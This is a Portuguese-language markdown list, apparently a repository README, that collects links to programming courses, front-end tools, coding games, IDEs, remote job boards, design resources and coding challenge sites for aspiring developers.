[🦆 Sites e cursos para aprender Azure](#-sites-e-cursos-para-aprender-azure) <br>
[🦅 Sites e cursos para aprender Django](#-sites-e-cursos-para-aprender-django) <br>
[🐏 Sites e cursos para aprender Gatsby](#-sites-e-cursos-para-aprender-gatsby) <br>
[🐂 Sites e cursos para aprender ASP.net](#-sites-e-cursos-para-aprender-aspnet) <br>
[🐖 Sites e cursos para aprender Inteligência Artificial](#-sites-e-cursos-para-aprender-inteligência-artificial) <br>
[🦀 Sites e cursos para aprender Machine Learning](#-sites-e-cursos-para-aprender-machine-learning) <br>
[🦑 Sites e cursos para aprender Data Science](#-sites-e-cursos-para-aprender-data-science) <br>
[🐙 Sites e cursos para aprender NumPy](#-sites-e-cursos-para-aprender-numpy) <br>
[🦃 Sites e cursos para aprender Pandas](#-sites-e-cursos-para-aprender-pandas) <br>
[🐟 Sites e cursos para aprender XML](#-sites-e-cursos-para-aprender-xml) <br>
[🦢 Sites e cursos para aprender Jenkins](#-sites-e-cursos-para-aprender-jenkins) <br>
[🐩 Sites e cursos para aprender Xamarin](#sites-e-cursos-para-aprender-xamarin) <br>
[🦁 Sites e cursos para aprender Matlab](#sites-e-cursos-para-aprender-matlab) <br>
[🦨 Sites e cursos para aprender Julia](#sites-e-cursos-para-aprender-julia) <br>
[🐨 Sites e cursos para aprender PowerShell](#-sites-e-cursos-para-aprender-powershell) <br>
[🐥 Sites e cursos para aprender Flask](#-sites-e-cursos-para-aprender-flask) <br>
[🐔 Sites e cursos para aprender Spring](#-sites-e-cursos-para-aprender-spring) <br>
[🐗 Sites e cursos para aprender Tailwind CSS](#-sites-e-cursos-para-aprender-tailwind-css) <br>
[🦐 Sites e cursos para aprender Styled Components](#-sites-e-cursos-para-aprender-styled-components) <br>
[🐎 Sites e cursos para aprender Magento](#-sites-e-cursos-para-aprender-magento) <br>
[🐜 Sites e cursos para aprender ArangoDB](#-sites-e-cursos-para-aprender-arangodb) <br>
[📚 Sites e cursos para aprender Linha de comando](#-sites-e-cursos-para-aprender-linha-de-comando) <br>
## 🔧 Ferramentas para tradução de conteúdo
> Muito do conteúdo desse repositório pode se encontrar em um idioma diferente do seu, desta maneira, fornecemos algumas ferramentas para que você consiga realizar a tradução do conteúdo, lembrando que o intuito desse guia é fornecer todo o conteúdo possível para que você possa se capacitar na área de tecnologia independente do idioma a qual o material é fornecido, visto que se você possuí interesse em consumir esse material isso não será um empecilho para você continue seus estudos.
- [Google Translate](https://translate.google.com.br/?hl=pt-BR)
- [Linguee](https://www.linguee.com.br/ingles-portugues/traducao/translate.html)
- [DeepL](https://www.deepl.com/pt-BR/translator)
- [Reverso](https://context.reverso.net/traducao/ingles-portugues/translate)
## 👨🏫 Sites para estudar programação
- [Rocketseat](https://rocketseat.com.br/) - Cursos gratuitos sobre as tecnologias mais quentes do mercado
- [Digital Innovation One](http://digitalinnovation.one/) - Plataforma de ensino gratuita que desenvolve e conecta talentos
- [Torne-se um Programador](https://www.torneseumprogramador.com.br/cursos) - Dezenas de cursos gratuitos completos e avançados com aplicações reais de mercado.
- [Curso em Vídeo](https://www.cursoemvideo.com/) - Cursos básicos gratuitos para iniciantes
- [Origamid](https://www.origamid.com/) - Cursos gratuitos e pagos paras desenvolver suas habilidades na área de UX & UI Design e desenvolvimento front-end
- [Udemy Development](https://www.udemy.com/courses/development/?price=price-free&sort=popularity) - +1.400 cursos de desenvolvimento gratuitos
- [Udemy IT](https://www.udemy.com/courses/it-and-software/?price=price-free&lang=pt&sort=popularity) - +100 cursos de TI e softwares
- [HackerRank](https://www.hackerrank.com/) - Desafios de Programação Back-end. Com IDE integrada
- [Hackereath](https://www.hackerearth.com/) - Site para desenvolver suas habilidades de código.
- [CoderByte](https://coderbyte.com/) - Desafios de Programação Back-end. Com IDE integrada
- [Coderchef](https://www.codechef.com/) - Site para Estuda sobre programação, código e afins.
- [W3Resources](https://w3resource.com) - Exercícios online para praticar de inúmeras linguagens
- [Coursera](https://www.coursera.org/) - Cursos gratuitos com conteúdos conceituados
- [Scrimba](https://scrimba.com/) - Cursos gratuitos e pagos para aprender as tecnologias mais demandadas do Front-end
- [CodePen](https://codepen.io/) - Rede social de desenvolvedores front-end
- [Codementor](https://www.codementor.io/) - Site para praticar e aprender a desenvolver suas skills como desenvolvedor
- [FreeCodeCamp](https://www.freecodecamp.org/) - Aprenda como codificar gratuitamente e ganhe portfólio ajudando organizações sem fins lucrativos
- [GeeksForGeeks](https://www.geeksforgeeks.org/) - Plataforma para desenvolver suas habilidade em diversas áreas da programação
- [W3Schools](https://www.w3schools.com) - Inúmeras documentações explicadas de forma intuitiva
- [Khan Academy](https://pt.khanacademy.org/) - Plataforma de estudos conceituada sobre aprendizado gamificado
- [Udacity](https://www.udacity.com/) - Aprendizado tecnológico com ps conteúdos mais quentes do mercado (IA, data science, cloud computing, etc)
- [SoloLearn](https://www.sololearn.com/) - Aprenda a programar gratuitamente pelo celular ou web
- [edX](https://www.edx.org/) - Aprenda com os melhores, cursos de ciência da computação e ciência de dados ministradas por docentes das maiores e melhores universidades de todo o mundo
- [Treehouse](https://teamtreehouse.com/) - Cursos para desenvolvedores e aprimomaromento de portfólio
- [Coding Ground](https://www.tutorialspoint.com/codingground.htm) - Várias plat - ormas de codificação online
- [TheOdinProject](https://www.theodinproject.com/) - Site para aprender programação e desenvolvimento por meio de cursos
- [FrontEndMaster](https://frontendmasters.com/) - Site para aprender programação e desenvolvimento por meio de cursos
- [Balta.io](https://balta.io) - Site para aprender programação e desenvolvimento por meio de cursos
- [FrontEndMaster](https://frontendmasters.com/) - Site para aprender programação e desenvolvimento por meio de cursos
- [DataScienceAcademy](https://www.datascienceacademy.com.br/) - Site com diversos cursos gratuitos para inciar no mundo de Python & DataScience
- [FIAPx](https://www.fiap.com.br/fiapx) - Site com diversos cursos gratuitos na área da tecnologia
- [FGV](https://educacao-executiva.fgv.br/busca?keys=&curso_tipo%5B%5D=517&modalidade%5B%5D=45&area-conhec%5B%5D=571&tipo_invest%5B1%5D=1&estados=26&cidades=251&unidade=All&sort_by=field_oferta_data_inicio_turma_value&items_per_page=10&mail_address_me=) - Site com diversos cursos gratuitos na área da tecnologia
- [CodeAcademy](https://www.codecademy.com/) - Site com diversos cursos gratuitos de programação (EN)
- [Kaggle](https://www.kaggle.com/learn) - Site com diversos cursos gratuitos de Python & DataScience (EN)
- [Complete Intro to Web Development](https://btholt.github.io/intro-to-web-dev-v2/) - Site com os principais conteúdos referentes a desenvolvimento web criado e mantido por um dos professores do site Frontend Masters (EN)
- [4noobs](https://github.com/he4rt/4noobs) - Repositório desenvolvido para mostrar os conhecimentos básicos em diversas linguagens e ferramentas para desenvolvedores iniciantes.
## 🎨 Sites para desenvolvedor front-end
- [Uiverse](https://uiverse.io/) - Rede social de elementos de interfaces.
- [Shape Dividers](https://shapedividers.com) - Gera divisores de formas verticais, responsivos, e animados facilmente com este gerador de divisores de formas SVG
- [Couleur](https://couleur.io) - Uma ferramenta de cores simples para ajudá-lo a encontrar uma boa paleta de cores para seu projeto da web)
- [Baseline CSS Filters](https://baseline.is/tools/css-photo-filters/) - 36 Belos filtros de fotos, com edição simples e CSS para copiar)
- [UI Deck](https://uideck.com) - Modelo de página de destino HTML gratuitos e premium, temas de bootstrap, modelos de React, modelos de Tailwind, modelos de site HTML, e kits de interface de usúario)
- [Naevner](https://naevner.com) - Descrição de cores em linguagem natural, gerador de códigos em cores hexadecimais)
- [Meta Tags](https://metatags.io/) - Elementos de metadados HTML gerados automaticamente para melhor o SEO
## 🎮 Sites para aprender a programar jogando
- [Code Combat](https://br.codecombat.com) - Site para aprender conceitos e linguagens de programação enquanto joga
- [CheckiO](https://checkio.org) - CheckiO é um site que tem como objetivo ensinar programação, mas todos os desafios de codificação devem ser concluídos em Python.
- [CodeWars](https://www.codewars.com/) - Desafios de Programação Back-end. IDE integrada
- [Schemaverse](https://schemaverse.com) - O Schemaverse é um jogo de estratégia baseado no espaço implementado inteiramente em um banco de dados PostgreSQL.
- [Code Monkey](https://codemonkey.com) - CodeMonkey é um ambiente de codificação de computador educacional que permite que iniciantes aprendam conceitos e linguagens de programação de computador.
- [Coding Games](https://www.codingame.com/) - Desafios Programação Back-end com foco em temática de jogos. IDE integrada
- [Edabit](https://edabit.com/) - Desafios de Programação Back-end. IDE integrada
- [Flexbox Zombie](https://mastery.games/flexboxzombies/) - Desafios com CSS Flexbox para se defender de zumbis
- [Flexbox Defense](http://www.flexboxdefense.com) - Desafios com CSS Flexbox para impedir que inimigos ultrapassem suas defesas
- [CSS Grid Attack](https://codingfantasy.com/games/css-grid-attack) - Ataque inimigos enquanto treina práticas de CSS, com uma narrativa mais profunda
- [Code](https://code.org/minecraft) - Site para estudos de algoritmos com a temática do jogo Minecraft
## ✨ Templates HTML gratuitos
- [Bootstrap Made](https://bootstrapmade.com/) - Temas HTML5 + CSS3 gratuitos
- [W3 Layouts](https://w3layouts.com) - Temas HTML5 + CSS3 gratuitos
- [One Page Love](https://onepagelove.com) - Temas HTML5 + CSS3 gratuitos
- [ThemeWagon Freebies](https://themewagon.com/theme_tag/free/) - Temas HTML5 + CSS3 gratuitos
- [HTML5 UP](https://html5up.net/) - Temas HTML5 + CSS3 gratuitos
## 🎯 Sites para aprender ou treinar CSS
- [CSS Grid Garden](http://cssgridgarden.com/) - Ferramenta online para estudos de Grid (CSS)
- [Flukeout](http://flukeout.github.io/) - Aplicação online para aprender CSS de forma prática
- [Flex Box Froggy](https://flexboxfroggy.com/) - Desafio de Programação Front-end focados na propriedade flex box. IDE integrada.
- [Flexbox Defense](http://www.flexboxdefense.com/) - Aprenda flexbox com um game
- [100 Dias de CSS](https://100dayscss.com) - 100 Desafios de CSS
- [CSS Battle](https://cssbattle.dev/) - Batalhas temporárias de CSS. IDE integrada
- [CSS Tricks](https://css-tricks.com/guides/) - Site para treinar
- [CSS Hell](https://csshell.dev/) - Coleção de erros comuns de CSS e como corrigi-los
## ⏰ Geradores de CSS
- [Neumorphism](https://neumorphism.io/) - Tendência aplicação border-radius
- [Fancy Border-Radius](https://9elements.github.io/fancy-border-radius/) - Gerador de formas com border-radius no CSS
- [WAIT! Animate](https://waitanimate.wstone.io) - Gerador de animações de CSS
- [Best CSS Button Generator](https://www.bestcssbuttongenerator.com) - Gerador de botões do CSS
- [HTML CSS JS Generator](https://html-css-js.com/css/generator/) - Gerador de HTML/CSS/JS
- [BennettFeely](https://bennettfeely.com/clippy/) - Criador de clip-path
- [Animista](https://animista.net) - Criador de animações
## 🔎 Sites para buscar vagas remotas
- [BairesDev](https://www.bairesdev.com)
- [Bergamot](https://bergamot.io)
- [Coodesh](https://coodesh.com)
- [Há Vagas](https://havagas.pt)
- [Hired](https://hired.com)
- [JustRemote](https://justremote.co)
- [Programathor](https://programathor.com.br/)
- [Remotar](https://remotar.com.br)
- [Remote OK](https://remoteok.io)
- [Strider](https://www.onstrider.com/)
- [Toptal](https://www.toptal.com)
- [Turing](https://www.turing.com)
- [Working Nomads](https://workingnomads.co)
- [X-Team](https://x-team.com)
## 🔧 Ferramentas de desenvolvimento:
- [Internxt](https://internxt.com/) - Internxt Drive é um armazenamento de arquivos de conhecimento zero serviço baseado na melhor privacidade e segurança da classe
- [Motion](https://motion.dev/) - Uma nova biblioteca de animação, construída na API Web Animations para o menor tamanho de arquivo e o desempenho mais rápido.
- [Hokusai](https://hokusai.app/) - Conteúdo sobre NFT's
- [Hidden Tools](https://hiddentools.dev) - Ampla coleção de ferramentas feitas pela comunidade disponiveís para uso
- [Dev Hints](https://devhints.io) - Coleção de cheatsheets
- [Bundlephobia](https://bundlephobia.com) - Descubra o custo de adicionar um pacote npm ao seu pacote
- [Refactoring Guru](https://refactoring.guru/pt-br/design-patterns) - Padrões de projetos "Design patterns"
- [DevDocs](https://devdocs.io/) - DevDocs combina várias documentações de API em uma interface rápida, organizada e pesquisável.
- [HTML Validator](https://www.freeformatter.com/html-validator.html) - Validação de arquivo HTML
- [HTML 5 Test](https://html5test.com/index.html) - Testa arquivos HTML5
- [Image Slide Maker](https://imageslidermaker.com/v2) - Ferramenta de geração gratuita do Image Slider Maker
- [.NET Fiddle](https://dotnetfiddle.net/) - Codifique e compartilhe projetos C# online
- [1PageRank](http://www.1pagerank.com/) - Rankeie seu site nos mecanismos de buscas e aprenda com a concorrência
- [4Devs](https://www.4devs.com.br/) - Ferramentas online gratuitas, geradores de cpf, conta bancária, pessoas, cnpj, cep, rg, validadores, encoders e muitas outras
- [Any API](https://any-api.com/) - Diretório gratuito com APIs públicas
- [Autoprefixer CSS](http://autoprefixer.github.io/) - Transpile código CSS atual para código CSS com maior cobertura de navegadores antigos
- [Browser diet](https://browserdiet.com/pt/) - Guia de performance para desenvolvimento web
- [Can I email...](https://www.caniemail.com/) - Descubra o que do HTML e CSS pode ser usado em estruturas de e-mail
- [Can I use...](https://caniuse.com/) - Descubra se você pode usar determinadas tecnologias web
- [CloudFlare](https://www.cloudflare.com/pt-br/) - CDN grátis
- [CMDER](https://cmder.net/) - Linha de comando simples, consegue rodar comands bash e Shell, alternativa ao Hyper
- [CodePen](https://codepen.io/) - Rede social de desenvolvedores front-end
- [CodeSandbox](https://codesandbox.io/) - Caixa de área para desenvolvedores web
- [Connection Strings](https://www.connectionstrings.com/) - Site com strings de conexão para diversas plataformas
- [CSS Formatter](https://www.cleancss.com/css-beautify/) - Retire a minificação e formate o código CSS
- [CSS Minifier](https://cssminifier.com/) - Conversor de código CSS para CSS minificado
- [CSS W3.org](https://jigsaw.w3.org/css-validator/) - Validar CSS
- [Debuggex: Online visual regex tester. JavaScript, Python, and PCRE](https://www.debuggex.com) - Construa e teste expressões regulares
- [docsify](https://docsify.js.org/#/) - Crie docs incríveis de projetos
- [EasyForms](https://easyforms.vercel.app/) - API open source que permite criação formulários de contato com HTML puro
- [Editor.md](https://pandao.github.io/editor.md/en.html) - Editor Markdown online e open source
- [ES6console](https://es6console.com/) - Compilador de JS para Ecmascript
- [Firebase](https://firebase.google.com/?hl=pt-BR) - Desenvolva aplicativos mobile e web incríveis este serviço da Google
- [Firefox Developer Edition](https://www.mozilla.org/pt-BR/firefox/developer/) - Navegador web para desenvolvedores web
- [Full Page Screen Capture](https://chrome.google.com/webstore/detail/full-page-screen-capture/fdpohaocaechififmbbbbbknoalclacl?hl=pt-BR) - Capture páginas inteiras com uma extensão para Chrome
- [generatedata](http://www.generatedata.com/) - Gerador de dados para testes
- [Git Command Explorer](https://gitexplorer.com/) - Encontre os comandos certos que você precisa sem vasculhar a web
- [GitHub Gist](https://gist.github.com/) - Faça pequenas anotações e pequenos códigos no GitHub Gist
- [Google Transparency Report](https://transparencyreport.google.com/safe-browsing/search) - Verificar segurança de um site
- [Grader](https://website.grader.com/) - Avaliação de site
- [How to Center in CSS](http://howtocenterincss.com/) - Gerador de código para divs ou textos que necessitam de centralização
- [Hyper](https://hyper.is/) - Linha de comando simples, útil e gratuito
- [Joomla](https://www.joomla.org/) - CMS gratuita
- [JS Bin](https://jsbin.com/) - Codifique e compartilhe projetos HTML, CSS e JS
- [JSCompress](https://jscompress.com/) - Conversor de código JS para JS minificado
- [JSON Editor Online](https://jsoneditoronline.org/) - Ferramenta para visualizar e editar arquivos JSON
- [JSFiddle](https://jsfiddle.net/) - Codifique projetos JS online
- [JSONLint](https://jsonlint.com/) - Ferramenta para validar seu JSON
- [JSON Generator](https://app.json-generator.com/) - Ferramenta para gerar JSON com base em template
- [KeyCDN Tools](https://tools.keycdn.com/) - Faça uma análise das suas aplicações web
- [Liveweave](https://liveweave.com/) - Codifique projetos HTML, CSS e JS
- [Lorem Ipsum](https://br.lipsum.com/) - Gerador de texto fictício
- [Mapbox](https://www.mapbox.com/) - Mapas e localização para desenvolvedores
- [Memcached](https://memcached.org/) - Melhore o desempenho de seu website com cache
- [Mockaroo](https://www.mockaroo.com/) - Gerador de dados para testes
- [Mussum Ipsum](https://mussumipsum.com/) - Gerador de texto fictício
- [NPM HTTP-Server](https://www.npmjs.com/package/http-server) - Rode um servidor local com um pacote npm
- [Password Generator](https://danieldeev.github.io/password-generator/) - Um gerador de senhas simples com foco na segurança
- [Online C Compiler](https://www.onlinegdb.com/online_c_compiler) - Ferramenta para compilar C online
- [React Dev Tools](https://chrome.google.com/webstore/detail/react-developer-tools/fmkadmapgofadopljbjfkapdkoienihi) - Ferramenta para debug do ReactJS
- [React Hook Form](https://react-hook-form.com/) - Valide seus formulários de projetos que utilizam React ou React Native
- [Readme.so](https://readme.so/pt) - Crie de maneira fácil o readme para seu projeto
- [RelaX](http://dbis-uibk.github.io/relax/index.htm) - Crie expressões algébricas relacionais de consultas
- [Responsive](http://www.codeorama.com/responsive/) - Teste a responsividade do seu site
- [Responsively](https://responsively.app/) - Ferramenta para facilitar a responsividade do seu site
- [Shields.io](https://shields.io/) - Gerador de badges para markdown
- [SSL Server Test](https://www.ssllabs.com/ssltest/) - Testar SSL de sites
- [StreamYard](https://streamyard.com/) - O StreamYard é um estúdio de transmissões ao vivo no seu navegador
- [Swagger](https://swagger.io/) - Ferramenta para projetar, construir, documentar e usar serviços da Web RESTful
- [Tabela ASCII](https://web.fe.up.pt/~ee96100/projecto/Tabela%20ascii.htm) - Tabela completa com caracteres ASCII
- [Telegram](https://telegram.org/) - Mensageiro criptografado
- [TinyJPG](https://tinyjpg.com/) - Comprima imagem do formato JPG
- [TinyPNG](https://tinypng.com/) - Comprima imagem do formato PNG
- [Creately](https://creately.com/) - Crie e altere lindos diagramas em tempo real com a sua equipe
- [Carbon](https://carbon.now.sh/) - Crie Snippets de codigo clean e bonitos
- [DbDiagram](https://dbdiagram.io/home) - Crie elegrantes diagramas de banco de dados e gere script ddl
- [SqlDesigner](https://ondras.zarovi.cz/sql/demo/) - Crie Diagramas de banco de dados de maneira rapida e gere script ddl
- [W3.org](https://validator.w3.org/) - Validar HTML
- [WakaTime](https://wakatime.com/) - Gerencie seu tempo de desenvolvimento
- [Web Developer](https://chrome.google.com/webstore/detail/web-developer/bfbameneiokkgbdmiekhjnmfkcnldhhm?hl=pt-BR) - Extensão para Chrome com multi-funções
- [Web.dev](https://web.dev/) - Testar website (criado pela Google)
- [WebPageTest](https://www.webpagetest.org/) - Testar perfomance de site
- [Wedsites](https://wedsites.com/) - Liste suas atividades e acompanhe seu progresso
- [WordPress](https://wordpress.org/) - Criação de blogs
- [XML Sitemaps](https://www.xml-sitemaps.com/) - Criador de sitemaps.xml
- [Patterns.dev](https://www.patterns.dev/) - Design patterns para projetos web modernos
- [Devhints](https://devhints.io/) - Documentação curta, prática e objetiva de cada linguagem de programação
## 🗂 Gerenciamento de projetos
- [Asana](https://asana.com/pt) - Gerenciamento de trabalho
- [Azure DevOps](https://azure.microsoft.com/services/devops/) - Gerenciamento de projetos focados em planejamento, colaboração e entregas
- [Dontpad](http://dontpad.com/) - Abas de anotações sem necessidade de cadastro
- [Draw.io](https://www.draw.io/) - Desenvolva mapas mentais incríveis
- [Evernote](https://evernote.com/intl/pt-br) - Notas autoadesivas na nuvem
- [Google Keep](https://keep.google.com/) - Notas autoadesivas na nuvem
- [Jira](https://www.atlassian.com/software/jira) - Gerenciador de projetos e monitoramento de tarefas
- [lucidchart](https://lucidchart.com) - Documentação e gerenciamento de tarefas em equipe
- [Miro](https://miro.com/) - Quadro branco colaborativo em tempo real
- [Notion](https://www.notion.so/) - Notas autoadesivas na nuvem e gerenciamento de projetos online
- [Pipefy](https://www.pipefy.com/) - Gerenciador de projetos (PMS)
- [Protectedtext](https://www.protectedtext.com/) - Abas de anotações criptografadas sem necessidade de cadastro
- [Slack](https://slack.com/) - Gerenciamento de projetos com equipes
- [Taiga](https://taiga.io/) - Controle de projetos com equipes através de quadros
- [Taskade](https://www.taskade.com/) - Gerenciamento de projetos pessoais e de equipe com notas e mapas mentais integrados
- [Things](https://culturedcode.com/things/) - Gerenciador de tarefas pessoais
- [Todoist](https://todoist.com/app?lang=pt_BR) - Gerenciamento de projetos pessoais e em equipe
- [Trello](https://www.trello.com/) - Gerencie seus projetos com quadros
- [YouTrack](https://www.jetbrains.com/youtrack/) - Gerenciador de projetos online
## 📝 IDEs e editores de código
- [Atom](https://atom.io/) - Editor de código do GitHub
- [BBEdit](https://www.barebones.com/products/bbedit/) - Editor de código para Mac OS
- [Beekeeper Studio](https://www.beekeeperstudio.io/) - Editor de código SQL e gerenciador de banco de dados
- [Brackets](http://brackets.io/) - Editor de código da Adobe
- [CodeBlocks](http://www.codeblocks.org/) - IDE para C e C++
- [Dev C++](https://sourceforge.net/projects/orwelldevcpp/) - IDE Dev C++ para liguagem C/C++
- [Eclipse](https://www.eclipse.org/downloads/) - IDE software livre da IBM
- [Geany](https://geany.org/) - Editor de texto poderoso, estável e leve
- [IntelliJ IDEA](https://www.jetbrains.com/idea/) - IDE da Jetbrains
- [NeoVim](https://neovim.io/) - Editor de código via terminal
- [LunarVim](https://www.lunarvim.org/#opinionated) - Editor de código via terminal baseado em NeoVim e Escrito em Lua
- [NetBeans](https://netbeans.org/) - IDE gratuita da Apache
- [Notepad++](https://notepad-plus-plus.org/) - Editor de código raíz
- [Code with Mu](https://codewith.mu) - Um editor de código Python simples, para iniciantes
- [PHPStorm](https://www.jetbrains.com/phpstorm/) - IDE específica para PHP
- [PyCharm](https://www.jetbrains.com/pycharm/) - IDE específica para Python
- [RStudio](https://www.rstudio.com/products/rstudio/download/#download) - IDE específica para a Linguagem R e suas variantes
- [StackEdit](https://stackedit.io/) - Editor de markdown online
- [Sublime Text](https://www.sublimetext.com/) - Sua licença expirou
- [Thonny](https://thonny.org) - IDE Python para iniciantes
- [Visual Studio](https://visualstudio.microsoft.com/pt-br/vs/) - IDE da Microsoft
- [Visual Studio Code](https://code.visualstudio.com/) - Editor de código da Microsoft
## 🖌 Design Front-end
- [Adobe XD](https://www.adobe.com/br/products/xd.html) - Software de design para projetos
- [Awwwards](https://www.awwwards.com) - Inspiração para interfaces e templates com o que há de mais novo em questão de design de interfaces
- [Bootstrap](https://www.getbootstrap.com/) - Framework CSS
- [BuildBootstrap](https://buildbootstrap.com/) - Crie layout responsivo para o framework Bootstrap na versão 3 e 4
- [Bulma CSS](https://bulma.io/) - Estrutura CSS gratuita baseada no Flexbox
- [Canva](https://www.canva.com/) - Ferramenta de design online
- [Chart.js](https://www.chartjs.org/) - Biblioteca JavaScript de criação de gráficos
- [Colors and Fonts](https://www.colorsandfonts.com/) - Apresenta paletas de cores e tipografia
- [Coolors](https://coolors.co/) - Palhetas de cores e monte a sua própria
- [Colors lol](https://colors.lol) - Repositório de paletas de cores
- [Cruip](https://cruip.com/) - Recursos de templates
- [CSS Effects Snippets](https://emilkowalski.github.io/css-effects-snippets/) - Animações CSS prontas para usar
- [CSS Layout](https://csslayout.io/) - Layouts e padrões populares feitos com CSS
- [CSS Reference](https://cssreference.io/) - Guia visual para CSS com referencias de uso
- [CSS Tricks](https://css-tricks.com/) - Blog com vários tutoriais frontend
- [DevSamples](https://www.devsamples.com/) - Exemplos de códigos fáceis de usar para HTML, CSS e JavaScript
- [Excalidraw](https://excalidraw.com) - Desenhe diagramas como se tivessem sido feitos a mão
- [Fancy Border-Radius](https://9elements.github.io/fancy-border-radius/) - Gerador de formas com border-radius no CSS
- [Figma](https://www.figma.com/) - Desenhe projetos online de apps, softwares e websites
- [Flatui Color Picker](http://www.flatuicolorpicker.com/) - Paleta de cores interativa de forma harmonizar o front
- [Font Flipper](https://fontflipper.com/) - Ferramenta para testar fontes
- [FontPair](https://fontpair.co/) - Ferramenta para combinações de fontes
- [FontSpark](https://fontspark.app/) - Gera fontes aleatórias de uma lista de fontes famosas usadas na web
- [Foundation](https://foundation.zurb.com/) - Framework responsivo
- [Framer](https://www.framer.com/) - Ferramenta de criação de interfaces interativas
- [FreeFrontEnd](https://freefrontend.com/) - Exemplos de códigos, tutoriais e artigos de HTML, CSS, Javascript (Angular, JQuery, React, Vue)
- [Gravit Designer](https://www.designer.io) - Ferramenta de design online com suporte a ilustração vetorial
- [Grid Layoutit](https://grid.layoutit.com/) - Gerador de grid para código CSS
- [HTML DOM](https://htmldom.dev/) - Gerenciar o DOM HTML com JavaScript vanilla
- [Interfacer](https://interfacer.xyz/) - Recursos para criação de interfaces
- [Interfaces.pro](https://interfaces.pro/) - Inspiração para interfaces
- [Invision](https://www.invisionapp.com/) - Software de design para projetos
- [Lottie](https://lottiefiles.com/) - Animações em after effects via json
- [Luna](https://github.com/OfficialMarinho/luna) - Framework CSS brasileiro
- [Material-UI](https://material-ui.com/) - Um framework de interface de usuário para React
- [Mockup](https://mockup.io/about/) - Visualize e colabore no design de aplicativos para dispositivos móveis
- [Nes.css](https://nostalgic-css.github.io/NES.css/) - Framework CSS estilo NES
- [Neumorphism](https://neumorphism.io/) - Tendência aplicação border-radius
- [Normalize CSS](https://necolas.github.io/normalize.css/) - Normaliza estruturas entre navegadores
- [Pixilart](https://www.pixilart.com/draw) - Desenhe pixel arts online
- [Pixlr](https://pixlr.com/br/) - Conjunto de ferramentas e utilitários de edição de imagem baseado em nuvem
- [PSD-To-CSS-Shadow](http://psd-to-css-shadows.com/) - Gera o script para uma sombra (box-shadow & text-shadow) no CSS baseado nas configurações de sombra no Photoshop
- [Pure.css](https://purecss.io/) - Framework CSS responsivo
- [Remove.bg](https://www.remove.bg/) - Remove fundos de imagens automaticamente
- [Sketch](https://www.sketch.com/) - Desenvolvimento de layouts em alta qualidade
- [Squoosh.app](https://squoosh.app/) - Compressor de imagens e comparador, via navegador
- [SweetAlert2](https://sweetalert2.github.io/) - Biblioteca JavaScript de alertas responsivos e customizáveis
- [Tailwind CSS](https://tailwindcss.com/) - Framework de estilo CSS
- [UI Gradients](https://uigradients.com/) - UI gradientes para utilizar
- [Vectorizer](https://www.vectorizer.io/) - Converta imagens como PNGs, BMPs e JPEGs em gráficos vetoriais (SVG, EPS, DXF)
- [Whimsical](https://whimsical.com/) - Flowchart, Wireframe, Sticky Notes e Mind Map
- [X-Icon Editor](http://www.xiconeditor.com/) - Gerador de favicon com alta resolução a partir de imagens
## 🔤 Linguagens de programação
- [C#](https://docs.microsoft.com/pt-br/dotnet/csharp/) - Linguagem de programação baseada no C++
- [Clojure](https://clojure.org/) - Linguagem de programação funcional (muito utilizada para IAs)
- [Dart](https://dart.dev/) - Linguagem de script voltada à web desenvolvida pela Google, utilizada no Flutter
- [Elixir](https://elixir-lang.org/) - Linguagem de programação funcional, concorrente, de propósito geral que executa na máquina virtual Erlang (BEAM)
- [F#](https://docs.microsoft.com/pt-br/dotnet/fsharp/) - Linguagem de programação orientada a objetos e funcional
- [Fortran](https://www.fortran90.org/) - Linguagem de programação desenvolvida pela IBM, usado na ciência da computação e análises numéricas
- [Go](https://golang.org/) - Linguagem de código aberto para tornar os programadores mais produtivos
- [Haskell](https://www.haskell.org/) - Linguagem de programação puramente funcional e estaticamente tipada
- [Java](https://www.java.com/pt_BR/) - Linguagem de programação tipada, orientada a objetos e de alta performance
- [JavaScript](http://brasil.js.org) - Constante evolução e crescimento no mercado
- [Julia](https://julialang.org/) - Linguagem de programação de código aberto e alto desempenho para computação técnica
- [Kotlin](https://kotlinlang.org/) - Linguagem de programação multiplataforma, orientada a objetos compila para a MVJ
- [Lua](https://www.lua.org/portugues.html) - Linguagem de programação originária do Brasil, permite programação procedural e POO (popular em jogos)
- [MatLab](https://www.mathworks.com/help/matlab/) - Linguagem de programação de alto nível com foco em cálculos e construção de gráficos
- [Pascal](https://docs.freepascal.org/) - Linguagem de programação imperativa, estruturada e orientada à objetos
- [Perl](https://www.perl.org/) - Linguagem de programação multiplataforma e dinâmica
- [PHP](https://www.php.net/) - A linguagem de programação dominante na web
- [Python](https://www.python.org/) - Muito indicada para projetos de dados, inteligência artificial, aprendizado de máquina e chatbots
- [R](https://cran.r-project.org/) - Linguagem de programação com foco em matemática, estatística, ciência de dados e aprendizagem de máquina
- [Ruby](https://www.ruby-lang.org/pt/) - Linguagem de programação de multiparadigma e tipagem dinâmica
- [Rust](https://www.rust-lang.org/pt-BR/) - Linguagem estáticamente tipada para sistemas rápidos, concorrentes, de baixo nível e seguros
- [Swift](https://www.apple.com/br/swift/) - Criada pela Apple para principalmente desenvolvimento de apps para iPhone
- [Scala](https://www.scala-lang.org/) - Linguagem de programação moderna, multi-paradigma, concisa, elegante e com tipagem segura
- [Visual Basic](https://docs.microsoft.com/pt-br/dotnet/visual-basic/) - Linguagem de programação da Microsoft (com IDE gráfica)
## 📕 Guia de Estilo
- [Airbnb - Javascript](https://github.com/airbnb/javascript) - Guia de estilo de código em JavaScript do Airbnb
- [Airbnb - Ruby](https://github.com/airbnb/ruby) - Guia de estilo de código em Ruby do Airbnb
- [Google - Boas práticas em Engenharia](https://github.com/google/eng-practices) - Boas práticas de Engenharia utilizadas pelos internos da Google
- [Google - C++](https://google.github.io/styleguide/cppguide.html) - Guia de estilo de código em C++ do Google
- [Google - Python](https://google.github.io/styleguide/pyguide.html) - Guia de estilo de código em Python do Google
- [Google - Java](https://google.github.io/styleguide/javaguide.html) - Guia de estilo de código em Java do Google
## 📁 Desafios
- [Ace Front End](https://www.acefrontend.com/) - Desafios de programação Front-end. Resultados via texto. IDE integrada
- [AdventoOfCode](https://adventofcode.com/) - Desafios de programação por temporada. Sem IDE integrada. Validação manual feita pelo usuário
- [App Ideas](https://github.com/florinpop17/app-ideas) - Compilado de desafios para você testar seus conhecimentos e aumentar seu portfólio
- [Capture The Flag - CTF](https://capturetheflag.com.br/) - Desafios reais de hacking, desenvolvido por especialistas brasileiros
- [ChallengeRocket](https://challengerocket.com/) - Desafios de Programação Back-end. IDE integrada
- [Code Golf - StackExchange](https://codegolf.stackexchange.com/) - Desafios de programação da comunidade para a comunidade, IDE integrada somente pelo Snippet
